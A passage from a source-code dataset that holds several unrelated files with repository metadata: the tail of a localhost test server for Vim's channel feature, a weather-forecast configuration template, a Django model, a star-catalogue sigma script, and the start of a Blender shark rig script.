                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'eval-result':
                        # Send back the last received eval result.
                        # NOTE(review): last_eval is a local of handle(); if
                        # 'eval-result' arrives before any eval response this
                        # raises UnboundLocalError — presumably the test always
                        # evals first; confirm.
                        response = last_eval
                    elif decoded[1] == 'call me':
                        cmd = '[0,"we called you"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'call me again':
                        cmd = '[0,"we did call you"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        # Empty response means: deliberately don't reply.
                        response = ""
                    elif decoded[1] == 'send zero':
                        cmd = '[0,"zero index"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "sent zero"
                    elif decoded[1] == 'close me':
                        print("closing")
                        self.request.close()
                        response = ""
                    elif decoded[1] == 'wait a bit':
                        time.sleep(0.2)
                        response = "waited"
                    elif decoded[1] == '!quit!':
                        # we're done
                        self.server.shutdown()
                        return
                    elif decoded[1] == '!crash!':
                        # Crash! (intentional ZeroDivisionError — the test
                        # exercises Vim's handling of a dying server)
                        42 / 0
                    else:
                        response = "what?"
                    if response == "":
                        print("no response")
                    else:
                        encoded = json.dumps([decoded[0], response])
                        print("sending: {0}".format(encoded))
                        self.request.sendall(encoded.encode('utf-8'))
                # Negative numbers are used for "eval" responses.
                elif decoded[0] < 0:
                    last_eval = decoded
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    """TCP server that handles each incoming connection in its own thread."""
    pass
def writePortInFile(port):
    """Write the server's port number to "Xportnr" so the Vim test can read it."""
    # Write the port number in Xportnr, so that the test knows it.
    # Context manager guarantees the file is flushed and closed even on error.
    with open("Xportnr", "w") as f:
        f.write("{0}".format(port))
def main(host, port, server_class=ThreadedTCPServer):
    """Start the channel test server on *host*:*port* and run until shutdown.

    port 0 lets the OS choose a free port; the chosen port is written to
    "Xportnr" for the Vim test to pick up.
    """
    # Wait half a second before opening the port to test waittime in ch_open().
    # We do want to get the port number, get that first. We cannot open the
    # socket, guess a port is free.
    if len(sys.argv) >= 2 and sys.argv[1] == 'delay':
        port = 13684
        writePortInFile(port)
        print("Wait for it...")
        time.sleep(0.5)
    server = server_class((host, port), ThreadedTCPRequestHandler)
    ip, port = server.server_address[0:2]
    # Start a thread with the server. That thread will then start a new thread
    # for each connection.
    server_thread = threading.Thread(target=server.serve_forever)
    server_thread.start()
    writePortInFile(port)
    print("Listening on port {0}".format(port))
    # Main thread terminates, but the server continues running
    # until server.shutdown() is called.
    try:
        while server_thread.is_alive():
            server_thread.join(1)
    except (KeyboardInterrupt, SystemExit):
        server.shutdown()
if __name__ == "__main__":
    # Listen on localhost with an OS-assigned free port (written to Xportnr).
    main("localhost", 0)
| 11,360 | 109 | 119 |
4fa43d72a0c2f0b29afa1fdf526729a277689f72 | 4,948 | py | Python | edexOsgi/com.raytheon.edex.plugin.gfe/utility/common_static/base/gfe/textproducts/templates/utility/CWF_Pacific_Site_MultiPil_Definition.py | srcarter3/awips2 | 37f31f5e88516b9fd576eaa49d43bfb762e1d174 | [
"Apache-2.0"
] | null | null | null | edexOsgi/com.raytheon.edex.plugin.gfe/utility/common_static/base/gfe/textproducts/templates/utility/CWF_Pacific_Site_MultiPil_Definition.py | srcarter3/awips2 | 37f31f5e88516b9fd576eaa49d43bfb762e1d174 | [
"Apache-2.0"
] | null | null | null | edexOsgi/com.raytheon.edex.plugin.gfe/utility/common_static/base/gfe/textproducts/templates/utility/CWF_Pacific_Site_MultiPil_Definition.py | srcarter3/awips2 | 37f31f5e88516b9fd576eaa49d43bfb762e1d174 | [
"Apache-2.0"
] | 1 | 2021-10-30T00:03:05.000Z | 2021-10-30T00:03:05.000Z | ##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: Raytheon Company
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
##
# This is a base file that is not intended to be overridden.
##
# ---------------------------------------------------------------------
# This software is in the public domain, furnished "as is", without
# technical support, and with no warranty, express or implied, as to
# its usefulness for any purpose.
#
# CWF_Pacific_<site>_<MultiPil>_Definition.TextUtility
#
# This file sets up all the Product Definition overrides for the
# CWF_Pacific formatter for a site.
#
# ---------------------------------------------------------------------
#**********************************************************************
# MAKE NO CHANGES HERE
# The minimum content of this file is the following Definition statement
Definition = {}
# End MAKE NO CHANGES HERE
#**********************************************************************
#####################################################
# Override VariableList if desired
#
#VariableList = []
#----- WFO <site> CWF_Pacific Definition -----
# Definition Statements must start in column 1.
# REQUIRED CONFIGURATION ITEMS
#Definition['displayName'] = None
Definition['displayName'] = "CWFPacific_<MultiPil>"
Definition["showZoneCombiner"] = 1 # 1 to cause zone combiner to display
Definition["defaultEditAreas"] = "Combinations_CWF_<site>_<MultiPil>"
Definition["mapNameForCombinations"] = "Marine_Zones_<site>" # Map background for creating Combinations
#Special multiple product domains for certain sites:
# ("<site>" / "_<MultiPil>" are template placeholders substituted at install
# time, so after configuration at most one branch below remains true; the
# UGC lists restrict the product to that office's marine sub-domain zones)
if "<site>" == "AJK":
    if "_<MultiPil>" == "_AJK":
        Definition["subDomainUGCs"] = ["PKZ011","PKZ012","PKZ013","PKZ021",
          "PKZ022","PKZ031","PKZ032","PKZ033",
          "PKZ034","PKZ035","PKZ036"]
    elif "_<MultiPil>" == "_AEG":
        Definition["subDomainUGCs"] = ["PKZ041","PKZ042","PKZ043","PKZ051",
          "PKZ052"]
elif "<site>" == "GUM":
    if "_<MultiPil>" == "_MY":
        Definition["subDomainUGCs"] = ["PMZ151","PMZ152","PMZ153","PMZ154"]
    elif "_<MultiPil>" == "_PQ":
        Definition["subDomainUGCs"] = ["PMZ161","PMZ171","PMZ172","PMZ173",
          "PMZ174","PMZ181","PMZ191"]
elif "<site>" == "AFG":
    if "_<MultiPil>" == "_NSB":
        Definition["subDomainUGCs"] = ["PKZ225","PKZ230","PKZ235","PKZ240",
          "PKZ245"]
    elif "_<MultiPil>" == "_WCZ":
        Definition["subDomainUGCs"] = ["PKZ200","PKZ210","PKZ215","PKZ220"]
# Header configuration items
#Definition["productName"] = "Coastal Waters Forecast" # name of product
Definition["fullStationID"] = "<fullStationID>" # full station identifier (4letter)
Definition["wmoID"] = "<wmoID>" # WMO ID
Definition["pil"] = "<pil>" # product pil
Definition["areaName"] = "<state>" # Name of state, such as "Georgia"
Definition["wfoCityState"] = "<wfoCityState>" # Location of WFO - city st
Definition["textdbPil"] = "<textdbPil>" # Product ID for storing to AWIPS text database.
Definition["awipsWANPil"] = "<awipsWANPil>" # Product ID for transmitting to AWIPS WAN.
Definition["outputFile"] = "{prddir}/TEXT/CWF_<MultiPil>.txt"
# OPTIONAL CONFIGURATION ITEMS
#Definition["database"] = "Official" # Source database. "Official", "Fcst", or "ISC"
#Definition["debug"] = 1
#Definition["hazardSamplingThreshold"] = (10, None) #(%cov, #points)
#Definition["editAreaSuffix"] = "_pt"
#Definition["periodCombining"] = 1 # If 1, do period combining
#Definition["includeEveningPeriod"] = 0 # If 1, include Evening Period
#Definition["useAbbreviations"] = 0 # If 1, use marine abbreviations
# Weather-related flags
#Definition["hoursSChcEnds"] = 24
# River Bar Zones
#Definition["riverBarZones"] = []
#Definition["areaDictionary"] = "AreaDictionary" # For product headers
#Definition["language"] = "english"
#Definition["lineLength"] = 66
#Definition["useHolidays"] = 1
# Trouble-shooting items
#Definition["passLimit"] = 20 # Limit on passes allowed through Narrative Tree
#Definition["trace"] = 1 # Set to 1 to turn on trace through
# Narrative Tree for trouble-shooting
| 41.233333 | 103 | 0.605093 | ##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: Raytheon Company
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
##
# This is a base file that is not intended to be overridden.
##
# ---------------------------------------------------------------------
# This software is in the public domain, furnished "as is", without
# technical support, and with no warranty, express or implied, as to
# its usefulness for any purpose.
#
# CWF_Pacific_<site>_<MultiPil>_Definition.TextUtility
#
# This file sets up all the Product Definition overrides for the
# CWF_Pacific formatter for a site.
#
# ---------------------------------------------------------------------
#**********************************************************************
# MAKE NO CHANGES HERE
# The minimum content of this file is the following Definition statement
Definition = {}
# End MAKE NO CHANGES HERE
#**********************************************************************
#####################################################
# Override VariableList if desired
#
#VariableList = []
#----- WFO <site> CWF_Pacific Definition -----
# Definition Statements must start in column 1.
# REQUIRED CONFIGURATION ITEMS
#Definition['displayName'] = None
Definition['displayName'] = "CWFPacific_<MultiPil>"
Definition["showZoneCombiner"] = 1 # 1 to cause zone combiner to display
Definition["defaultEditAreas"] = "Combinations_CWF_<site>_<MultiPil>"
Definition["mapNameForCombinations"] = "Marine_Zones_<site>" # Map background for creating Combinations
#Special multiple product domains for certain sites:
# NOTE(review): the "<site>"/"_<MultiPil>" strings appear to be template tokens
# substituted when this file is localized for a WFO, so at most one branch
# below is ever true in a deployed copy -- confirm against the install tooling.
if "<site>" == "AJK":
    if "_<MultiPil>" == "_AJK":
        Definition["subDomainUGCs"] = ["PKZ011","PKZ012","PKZ013","PKZ021",
                                       "PKZ022","PKZ031","PKZ032","PKZ033",
                                       "PKZ034","PKZ035","PKZ036"]
    elif "_<MultiPil>" == "_AEG":
        Definition["subDomainUGCs"] = ["PKZ041","PKZ042","PKZ043","PKZ051",
                                       "PKZ052"]
elif "<site>" == "GUM":
    if "_<MultiPil>" == "_MY":
        Definition["subDomainUGCs"] = ["PMZ151","PMZ152","PMZ153","PMZ154"]
    elif "_<MultiPil>" == "_PQ":
        Definition["subDomainUGCs"] = ["PMZ161","PMZ171","PMZ172","PMZ173",
                                       "PMZ174","PMZ181","PMZ191"]
elif "<site>" == "AFG":
    if "_<MultiPil>" == "_NSB":
        Definition["subDomainUGCs"] = ["PKZ225","PKZ230","PKZ235","PKZ240",
                                       "PKZ245"]
    elif "_<MultiPil>" == "_WCZ":
        Definition["subDomainUGCs"] = ["PKZ200","PKZ210","PKZ215","PKZ220"]
# Header configuration items
#Definition["productName"] = "Coastal Waters Forecast" # name of product
Definition["fullStationID"] = "<fullStationID>" # full station identifier (4letter)
Definition["wmoID"] = "<wmoID>" # WMO ID
Definition["pil"] = "<pil>" # product pil
Definition["areaName"] = "<state>" # Name of state, such as "Georgia"
Definition["wfoCityState"] = "<wfoCityState>" # Location of WFO - city st
Definition["textdbPil"] = "<textdbPil>" # Product ID for storing to AWIPS text database.
Definition["awipsWANPil"] = "<awipsWANPil>" # Product ID for transmitting to AWIPS WAN.
Definition["outputFile"] = "{prddir}/TEXT/CWF_<MultiPil>.txt"
# OPTIONAL CONFIGURATION ITEMS
#Definition["database"] = "Official" # Source database. "Official", "Fcst", or "ISC"
#Definition["debug"] = 1
#Definition["hazardSamplingThreshold"] = (10, None) #(%cov, #points)
#Definition["editAreaSuffix"] = "_pt"
#Definition["periodCombining"] = 1 # If 1, do period combining
#Definition["includeEveningPeriod"] = 0 # If 1, include Evening Period
#Definition["useAbbreviations"] = 0 # If 1, use marine abbreviations
# Weather-related flags
#Definition["hoursSChcEnds"] = 24
# River Bar Zones
#Definition["riverBarZones"] = []
#Definition["areaDictionary"] = "AreaDictionary" # For product headers
#Definition["language"] = "english"
#Definition["lineLength"] = 66
#Definition["useHolidays"] = 1
# Trouble-shooting items
#Definition["passLimit"] = 20 # Limit on passes allowed through Narrative Tree
#Definition["trace"] = 1 # Set to 1 to turn on trace through
# Narrative Tree for trouble-shooting
| 0 | 0 | 0 |
bbc7cdc6585a469f97577c73e2c29aaa3ad18a36 | 290 | py | Python | market/products/models/category.py | hbvj99/market-api | 489c9433556002cb391b93cbd6486da739c2418a | [
"MIT"
] | 1 | 2021-08-28T05:30:40.000Z | 2021-08-28T05:30:40.000Z | market/products/models/category.py | hbvj99/market-api | 489c9433556002cb391b93cbd6486da739c2418a | [
"MIT"
] | 1 | 2022-01-14T08:57:19.000Z | 2022-01-14T08:57:20.000Z | market/products/models/category.py | hbvj99/market-api | 489c9433556002cb391b93cbd6486da739c2418a | [
"MIT"
] | 1 | 2022-01-11T10:14:27.000Z | 2022-01-11T10:14:27.000Z | from django.db import models
from django.utils.translation import ugettext_lazy as _
from ...commons.models import BaseModel
| 29 | 67 | 0.755172 | from django.db import models
from django.utils.translation import ugettext_lazy as _
from ...commons.models import BaseModel
class Category(BaseModel):
    """Product category: a display name plus a short category code."""

    # Human-readable category label.
    name = models.CharField(_('name'), max_length=90, blank=False)
    # Category code; presumably used as a lookup key -- no unique constraint
    # is declared here, confirm against callers before relying on uniqueness.
    code = models.CharField(_('code'), max_length=110, blank=False)
| 0 | 140 | 23 |
966f8e183f43f4d45660343c45bd7a42887ab7e1 | 22 | py | Python | core/constants/not_available.py | eugene-the-red/automata-core | 8470232ac17410fb907cb285b8102c1712699740 | [
"Unlicense"
] | null | null | null | core/constants/not_available.py | eugene-the-red/automata-core | 8470232ac17410fb907cb285b8102c1712699740 | [
"Unlicense"
] | null | null | null | core/constants/not_available.py | eugene-the-red/automata-core | 8470232ac17410fb907cb285b8102c1712699740 | [
"Unlicense"
] | null | null | null | NOT_AVAILABLE = 'N/A'
| 11 | 21 | 0.681818 | NOT_AVAILABLE = 'N/A'
| 0 | 0 | 0 |
c11aa728ef111b13cb8574664ef704a9344ead5d | 5,546 | py | Python | Sigma_Selection.py | Jamun-Fanatic-Foreva/STADS---Star-Matching | 0a96885a168b8de86eb4f51ba401980969023452 | [
"MIT"
] | 1 | 2019-10-29T13:13:48.000Z | 2019-10-29T13:13:48.000Z | Sigma_Selection.py | Jamun-Fanatic-Foreva/STADS---Star-Matching | 0a96885a168b8de86eb4f51ba401980969023452 | [
"MIT"
] | null | null | null | Sigma_Selection.py | Jamun-Fanatic-Foreva/STADS---Star-Matching | 0a96885a168b8de86eb4f51ba401980969023452 | [
"MIT"
] | 1 | 2020-03-09T17:28:18.000Z | 2020-03-09T17:28:18.000Z | import numpy as np
import pandas as pd
import time, gc
from GV_Catalogue_Gen import angularDistance
def genSigmaCatalogue(CATALOGUE, mag_limit=6, FOV_limit=20):
    '''
    Generates the mean of the sigma for each star in the catalogue.

    Sigma between star A and star B is defined as (1/6) of the angular
    distance between the two stars. Such sigmas are computed from star A
    to every "nearest neighbour" -- every other star whose angular
    distance from A is within the circular FOV defined by FOV_limit.
    The mean of those sigmas is mu_n for star A; one (Star_ID, mu_n)
    record is produced per star.

    Parameters
    ----------
    CATALOGUE : pd.DataFrame
        The 'master' star catalogue with columns Star_ID/RA/Dec/Mag
        (in that column order).
    mag_limit : float, default = 6
        Upper magnitude limit of stars kept in the restricted catalogue.
    FOV_limit : float, default = 20
        Circular radius (degrees) within which another star counts as a
        nearest neighbour.

    Returns
    -------
    SIGMA_CATALOGUE : pd.DataFrame
        Columns ['Star_ID', 'mu_n'].  mu_n is NaN for a star with no
        neighbour inside FOV_limit (mean of an empty selection).
    '''
    start = time.time()

    # Restrict the catalogue to stars at or brighter than mag_limit.
    # .copy() detaches from CATALOGUE so the index reset below cannot
    # trigger a SettingWithCopy problem or mutate the caller's frame.
    stars = CATALOGUE[CATALOGUE.Mag <= mag_limit].copy()
    rows = stars.shape[0]
    stars.index = list(range(rows))

    print('Number of stars - ', rows)
    print('Number of unique combinations per star= ', (rows - 1) * rows)

    # Accumulate plain-dict records and build the result once at the end.
    # The original row-by-row DataFrame.append was quadratic and has been
    # removed from pandas (>= 2.0); pd.DataFrame(records) replaces it.
    records = []
    for i in range(rows):
        star_id, ra, dec, mag = stars.iloc[i]

        # Every other star, reindexed 0..rows-2 so it aligns with the
        # broadcast columns of the current star below.
        others = stars.drop(i)
        others.index = list(range(rows - 1))

        # Pair the current star (broadcast down the frame) with all others.
        current = pd.DataFrame(
            {'Star_ID1': star_id, 'RA_1': ra, 'Dec_1': dec, 'Mag_1': mag},
            index=others.index,
        )
        pairs = pd.concat([current, others], axis=1)
        pairs.columns = ['Star_ID1', 'RA_1', 'Dec_1', 'Mag_1',
                         'Star_ID2', 'RA_2', 'Dec_2', 'Mag_2']

        # Angular distance between the two stars of every pair.
        cols = ['RA_1', 'RA_2', 'Dec_1', 'Dec_2']
        pairs['Ang_Distance'] = pairs.apply(angularDistance, axis=1,
                                            col_names=cols)

        # Keep only the nearest neighbours (inside the circular FOV).
        neighbours = pairs[pairs.Ang_Distance <= FOV_limit]

        # sigma_i = Ang_Distance_i / 6, so mu_n = mean(Ang_Distance) / 6.
        mu_n = neighbours.Ang_Distance.mean() / 6

        records.append({'Star_ID': star_id, 'mu_n': mu_n})

        # Periodically release memory back to the OS and show progress,
        # matching the original behaviour.
        if i % 100 == 0:
            gc.collect()
            print(i / 100)

    SIGMA_CATALOGUE = pd.DataFrame(records, columns=['Star_ID', 'mu_n'])

    print('Time Taken - ', np.round(time.time() - start, 3))
    return SIGMA_CATALOGUE
def main():
    '''
    Entry point: build the sigma catalogue from the master star
    catalogue and export it as a CSV file.
    '''
    # Load the 'master' star catalogue.
    #   StarID: primary key from a larger "master database" of stars
    #   Mag:    the star's apparent visual magnitude
    #   RA/Dec: right ascension and declination, epoch 2000.0
    #           (RA in hrs, Dec in degrees)
    master = pd.read_csv(r"F:\IIT Bombay\SatLab\Star Tracker\Programs\Catalogues\Modified Star Catalogue.csv")

    # Brightest stars first.
    master.sort_values('Mag', inplace=True)

    # Compute mu_n per star, order by it, and write the result out.
    sigma_catalogue = genSigmaCatalogue(master, mag_limit=6, FOV_limit=20)
    sigma_catalogue.sort_values('mu_n', inplace=True)
    sigma_catalogue.to_csv('SigmaCatalogue.csv', index=False)
    print('Done')
if __name__ == '__main__':
main()
| 37.986301 | 114 | 0.624594 | import numpy as np
import pandas as pd
import time, gc
from GV_Catalogue_Gen import angularDistance
def genSigmaCatalogue(CATALOGUE, mag_limit=6, FOV_limit=20):
    '''
    Generates the mean of the sigma for each star in the catalogue.

    Sigma between star A and star B is defined as (1/6) of the angular
    distance between the two stars. Such sigmas are computed from star A
    to every "nearest neighbour" -- every other star whose angular
    distance from A is within the circular FOV defined by FOV_limit.
    The mean of those sigmas is mu_n for star A; one (Star_ID, mu_n)
    record is produced per star.

    Parameters
    ----------
    CATALOGUE : pd.DataFrame
        The 'master' star catalogue with columns Star_ID/RA/Dec/Mag
        (in that column order).
    mag_limit : float, default = 6
        Upper magnitude limit of stars kept in the restricted catalogue.
    FOV_limit : float, default = 20
        Circular radius (degrees) within which another star counts as a
        nearest neighbour.

    Returns
    -------
    SIGMA_CATALOGUE : pd.DataFrame
        Columns ['Star_ID', 'mu_n'].  mu_n is NaN for a star with no
        neighbour inside FOV_limit (mean of an empty selection).
    '''
    start = time.time()

    # Restrict the catalogue to stars at or brighter than mag_limit.
    # .copy() detaches from CATALOGUE so the index reset below cannot
    # trigger a SettingWithCopy problem or mutate the caller's frame.
    stars = CATALOGUE[CATALOGUE.Mag <= mag_limit].copy()
    rows = stars.shape[0]
    stars.index = list(range(rows))

    print('Number of stars - ', rows)
    print('Number of unique combinations per star= ', (rows - 1) * rows)

    # Accumulate plain-dict records and build the result once at the end.
    # The original row-by-row DataFrame.append was quadratic and has been
    # removed from pandas (>= 2.0); pd.DataFrame(records) replaces it.
    records = []
    for i in range(rows):
        star_id, ra, dec, mag = stars.iloc[i]

        # Every other star, reindexed 0..rows-2 so it aligns with the
        # broadcast columns of the current star below.
        others = stars.drop(i)
        others.index = list(range(rows - 1))

        # Pair the current star (broadcast down the frame) with all others.
        current = pd.DataFrame(
            {'Star_ID1': star_id, 'RA_1': ra, 'Dec_1': dec, 'Mag_1': mag},
            index=others.index,
        )
        pairs = pd.concat([current, others], axis=1)
        pairs.columns = ['Star_ID1', 'RA_1', 'Dec_1', 'Mag_1',
                         'Star_ID2', 'RA_2', 'Dec_2', 'Mag_2']

        # Angular distance between the two stars of every pair.
        cols = ['RA_1', 'RA_2', 'Dec_1', 'Dec_2']
        pairs['Ang_Distance'] = pairs.apply(angularDistance, axis=1,
                                            col_names=cols)

        # Keep only the nearest neighbours (inside the circular FOV).
        neighbours = pairs[pairs.Ang_Distance <= FOV_limit]

        # sigma_i = Ang_Distance_i / 6, so mu_n = mean(Ang_Distance) / 6.
        mu_n = neighbours.Ang_Distance.mean() / 6

        records.append({'Star_ID': star_id, 'mu_n': mu_n})

        # Periodically release memory back to the OS and show progress,
        # matching the original behaviour.
        if i % 100 == 0:
            gc.collect()
            print(i / 100)

    SIGMA_CATALOGUE = pd.DataFrame(records, columns=['Star_ID', 'mu_n'])

    print('Time Taken - ', np.round(time.time() - start, 3))
    return SIGMA_CATALOGUE
def main():
    '''
    Entry point: build the sigma catalogue from the master star
    catalogue and export it as a CSV file.
    '''
    # Load the 'master' star catalogue.
    #   StarID: primary key from a larger "master database" of stars
    #   Mag:    the star's apparent visual magnitude
    #   RA/Dec: right ascension and declination, epoch 2000.0
    #           (RA in hrs, Dec in degrees)
    master = pd.read_csv(r"F:\IIT Bombay\SatLab\Star Tracker\Programs\Catalogues\Modified Star Catalogue.csv")

    # Brightest stars first.
    master.sort_values('Mag', inplace=True)

    # Compute mu_n per star, order by it, and write the result out.
    sigma_catalogue = genSigmaCatalogue(master, mag_limit=6, FOV_limit=20)
    sigma_catalogue.sort_values('mu_n', inplace=True)
    sigma_catalogue.to_csv('SigmaCatalogue.csv', index=False)
    print('Done')
if __name__ == '__main__':
main()
| 0 | 0 | 0 |
dc3fb8bf5ca7ab124eb669944f953b242d6ee9e0 | 39,659 | py | Python | blender/2.79/scripts/addons/rigify/metarigs/Animals/shark.py | uzairakbar/bpy2.79 | 3a3e0004ac6783c4e4b89d939e4432de99026a85 | [
"MIT"
] | 2 | 2019-11-27T09:05:42.000Z | 2020-02-20T01:25:23.000Z | rigify/metarigs/Animals/shark.py | 1-MillionParanoidTterabytes/blender-addons-master | acc8fc23a38e6e89099c3e5079bea31ce85da06a | [
"Unlicense"
] | null | null | null | rigify/metarigs/Animals/shark.py | 1-MillionParanoidTterabytes/blender-addons-master | acc8fc23a38e6e89099c3e5079bea31ce85da06a | [
"Unlicense"
] | 4 | 2020-02-19T20:02:26.000Z | 2022-02-11T18:47:56.000Z | import bpy
from mathutils import Color
if __name__ == "__main__":
create(bpy.context.active_object) | 49.948363 | 270 | 0.666154 | import bpy
from mathutils import Color
def create(obj):
# generated by rigify.utils.write_metarig
bpy.ops.object.mode_set(mode='EDIT')
arm = obj.data
for i in range(6):
arm.rigify_colors.add()
arm.rigify_colors[0].name = "Root"
arm.rigify_colors[0].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[0].normal = Color((0.4352940022945404, 0.18431399762630463, 0.4156860113143921))
arm.rigify_colors[0].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[0].standard_colors_lock = True
arm.rigify_colors[1].name = "IK"
arm.rigify_colors[1].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[1].normal = Color((0.6039220094680786, 0.0, 0.0))
arm.rigify_colors[1].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[1].standard_colors_lock = True
arm.rigify_colors[2].name = "Specials"
arm.rigify_colors[2].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[2].normal = Color((0.9568629860877991, 0.7882350087165833, 0.04705899953842163))
arm.rigify_colors[2].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[2].standard_colors_lock = True
arm.rigify_colors[3].name = "Tweak"
arm.rigify_colors[3].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[3].normal = Color((0.03921600058674812, 0.21176500618457794, 0.5803920030593872))
arm.rigify_colors[3].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[3].standard_colors_lock = True
arm.rigify_colors[4].name = "FK"
arm.rigify_colors[4].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[4].normal = Color((0.11764699965715408, 0.5686269998550415, 0.035294000059366226))
arm.rigify_colors[4].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[4].standard_colors_lock = True
arm.rigify_colors[5].name = "Extra"
arm.rigify_colors[5].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[5].normal = Color((0.9686279892921448, 0.2509799897670746, 0.09411799907684326))
arm.rigify_colors[5].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[5].standard_colors_lock = True
for i in range(29):
arm.rigify_layers.add()
arm.rigify_layers[0].name = "Face"
arm.rigify_layers[0].row = 1
arm.rigify_layers[0].set = False
arm.rigify_layers[0].group = 5
arm.rigify_layers[1].name = "Face (Tweak)"
arm.rigify_layers[1].row = 2
arm.rigify_layers[1].set = False
arm.rigify_layers[1].group = 4
arm.rigify_layers[2].name = " "
arm.rigify_layers[2].row = 1
arm.rigify_layers[2].set = False
arm.rigify_layers[2].group = 0
arm.rigify_layers[3].name = "Spine"
arm.rigify_layers[3].row = 3
arm.rigify_layers[3].set = False
arm.rigify_layers[3].group = 3
arm.rigify_layers[4].name = "Spine (Tweak)"
arm.rigify_layers[4].row = 4
arm.rigify_layers[4].set = False
arm.rigify_layers[4].group = 4
arm.rigify_layers[5].name = "Tail"
arm.rigify_layers[5].row = 5
arm.rigify_layers[5].set = False
arm.rigify_layers[5].group = 6
arm.rigify_layers[6].name = "Fins.L"
arm.rigify_layers[6].row = 6
arm.rigify_layers[6].set = False
arm.rigify_layers[6].group = 5
arm.rigify_layers[7].name = "Fins.L (Tweak)"
arm.rigify_layers[7].row = 7
arm.rigify_layers[7].set = False
arm.rigify_layers[7].group = 4
arm.rigify_layers[8].name = "Fins.R"
arm.rigify_layers[8].row = 6
arm.rigify_layers[8].set = False
arm.rigify_layers[8].group = 5
arm.rigify_layers[9].name = "Fins.R (Tweak)"
arm.rigify_layers[9].row = 7
arm.rigify_layers[9].set = False
arm.rigify_layers[9].group = 4
arm.rigify_layers[10].name = "Fins"
arm.rigify_layers[10].row = 8
arm.rigify_layers[10].set = False
arm.rigify_layers[10].group = 3
arm.rigify_layers[11].name = "Fins (Tweak)"
arm.rigify_layers[11].row = 9
arm.rigify_layers[11].set = False
arm.rigify_layers[11].group = 4
arm.rigify_layers[12].name = " "
arm.rigify_layers[12].row = 1
arm.rigify_layers[12].set = False
arm.rigify_layers[12].group = 0
arm.rigify_layers[13].name = " "
arm.rigify_layers[13].row = 1
arm.rigify_layers[13].set = False
arm.rigify_layers[13].group = 6
arm.rigify_layers[14].name = " "
arm.rigify_layers[14].row = 1
arm.rigify_layers[14].set = False
arm.rigify_layers[14].group = 0
arm.rigify_layers[15].name = " "
arm.rigify_layers[15].row = 1
arm.rigify_layers[15].set = False
arm.rigify_layers[15].group = 0
arm.rigify_layers[16].name = " "
arm.rigify_layers[16].row = 1
arm.rigify_layers[16].set = False
arm.rigify_layers[16].group = 0
arm.rigify_layers[17].name = " "
arm.rigify_layers[17].row = 1
arm.rigify_layers[17].set = False
arm.rigify_layers[17].group = 0
arm.rigify_layers[18].name = " "
arm.rigify_layers[18].row = 1
arm.rigify_layers[18].set = False
arm.rigify_layers[18].group = 0
arm.rigify_layers[19].name = " "
arm.rigify_layers[19].row = 1
arm.rigify_layers[19].set = False
arm.rigify_layers[19].group = 0
arm.rigify_layers[20].name = " "
arm.rigify_layers[20].row = 1
arm.rigify_layers[20].set = False
arm.rigify_layers[20].group = 0
arm.rigify_layers[21].name = " "
arm.rigify_layers[21].row = 1
arm.rigify_layers[21].set = False
arm.rigify_layers[21].group = 0
arm.rigify_layers[22].name = " "
arm.rigify_layers[22].row = 1
arm.rigify_layers[22].set = False
arm.rigify_layers[22].group = 0
arm.rigify_layers[23].name = " "
arm.rigify_layers[23].row = 1
arm.rigify_layers[23].set = False
arm.rigify_layers[23].group = 0
arm.rigify_layers[24].name = " "
arm.rigify_layers[24].row = 1
arm.rigify_layers[24].set = False
arm.rigify_layers[24].group = 0
arm.rigify_layers[25].name = " "
arm.rigify_layers[25].row = 1
arm.rigify_layers[25].set = False
arm.rigify_layers[25].group = 0
arm.rigify_layers[26].name = " "
arm.rigify_layers[26].row = 1
arm.rigify_layers[26].set = False
arm.rigify_layers[26].group = 0
arm.rigify_layers[27].name = " "
arm.rigify_layers[27].row = 1
arm.rigify_layers[27].set = False
arm.rigify_layers[27].group = 0
arm.rigify_layers[28].name = "Root"
arm.rigify_layers[28].row = 14
arm.rigify_layers[28].set = False
arm.rigify_layers[28].group = 1
bones = {}
bone = arm.edit_bones.new('spine')
bone.head[:] = -0.0000, 1.3362, 0.4776
bone.tail[:] = -0.0000, 1.0816, 0.4540
bone.roll = 0.0000
bone.use_connect = False
bones['spine'] = bone.name
bone = arm.edit_bones.new('spine.001')
bone.head[:] = -0.0000, 1.0816, 0.4540
bone.tail[:] = -0.0000, 0.7152, 0.4305
bone.roll = -0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine']]
